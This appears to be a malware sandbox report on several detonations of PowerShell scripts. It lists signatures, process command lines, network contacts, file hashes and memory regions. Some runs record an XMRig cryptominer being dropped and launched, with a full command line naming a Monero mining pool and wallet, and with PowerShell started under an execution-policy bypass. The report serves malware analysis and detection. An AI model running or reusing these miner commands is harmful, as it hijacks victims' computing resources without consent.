N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/1436-0-0x00007FFE06133000-0x00007FFE06135000-memory.dmp

memory/1436-1-0x000002425C8E0000-0x000002425C902000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uuijxreg.sde.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1436-10-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

memory/1436-11-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

memory/1436-12-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

memory/1436-13-0x00007FFE06133000-0x00007FFE06135000-memory.dmp

memory/1436-14-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:50

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 52.111.229.48:443 tcp

Files

memory/1352-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sygrxq5o.m5a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1352-9-0x00000236F1A90000-0x00000236F1AB2000-memory.dmp

memory/1352-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-14-0x00000236F20A0000-0x00000236F20B2000-memory.dmp

memory/1352-15-0x00000236F1F90000-0x00000236F1F9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1800-46-0x0000018BB6450000-0x0000018BB6470000-memory.dmp

memory/1800-47-0x0000018BB64A0000-0x0000018BB64C0000-memory.dmp

memory/1800-48-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-53-0x0000018C4A400000-0x0000018C4A420000-memory.dmp

memory/1800-52-0x0000018C4A3E0000-0x0000018C4A400000-memory.dmp

memory/1800-49-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1352-51-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/1352-50-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/1800-54-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-55-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-56-0x0000018C4A3E0000-0x0000018C4A400000-memory.dmp

memory/1800-57-0x0000018C4A400000-0x0000018C4A420000-memory.dmp

memory/1800-58-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-59-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-60-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-61-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-62-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-63-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-64-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-65-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-66-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-67-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-68-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-69-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-70-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-71-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-72-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-73-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-74-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-75-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-76-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-77-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-78-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-79-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-80-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-81-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-82-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-83-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-84-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-85-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-86-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-87-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-88-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-89-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-90-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-91-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-92-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-93-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-94-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-95-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-96-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-97-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-98-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-99-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-100-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-101-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-102-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-103-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-104-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-105-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-106-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-107-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-108-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-109-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-110-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-111-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-112-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-113-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-114-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-115-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

memory/1800-116-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win10v2004-20240508-en

Max time kernel

1755s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/2504-0-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzqadwub.jvw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2504-10-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-11-0x000002087DC60000-0x000002087DC82000-memory.dmp

memory/2504-12-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-13-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-14-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-15-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

memory/2504-16-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

memory/2504-17-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:17

Platform

win10v2004-20240508-en

Max time kernel

1727s

Max time network

1741s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/3276-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/3276-1-0x0000022BEE440000-0x0000022BEE462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cd4rylai.r3y.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3276-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-13-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-15-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/3276-16-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/3276-17-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:03

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 215.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp

Files

memory/3816-3-0x00007FFEF9163000-0x00007FFEF9164000-memory.dmp

memory/3816-5-0x00000227C4960000-0x00000227C4982000-memory.dmp

memory/3816-6-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-9-0x00000227DCEB0000-0x00000227DCF26000-memory.dmp

memory/3816-10-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sa2whhed.bxu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3816-25-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-48-0x00000227DCE50000-0x00000227DCE62000-memory.dmp

memory/3816-61-0x00000227DCE30000-0x00000227DCE3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1672-90-0x0000015BDB2B0000-0x0000015BDB2D0000-memory.dmp

memory/1672-91-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/3816-92-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-94-0x00007FFEF9163000-0x00007FFEF9164000-memory.dmp

memory/1672-93-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/3816-95-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/3816-96-0x00007FFEF9160000-0x00007FFEF9B4C000-memory.dmp

memory/1672-97-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-98-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-99-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-100-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-101-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-102-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-103-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-104-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-105-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-106-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-107-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-108-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-109-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-110-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-111-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-112-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-113-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-114-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-115-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-116-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-117-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-118-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-119-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-120-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-121-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-122-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-123-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-124-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-125-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-126-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-127-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-128-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-129-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-130-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-131-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-132-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-133-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-134-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-135-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-136-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-137-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-138-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-139-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-140-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-141-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-142-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-143-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-144-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-145-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-146-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-147-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-148-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-149-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-150-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-151-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-152-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-153-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-154-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-155-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-156-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-157-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
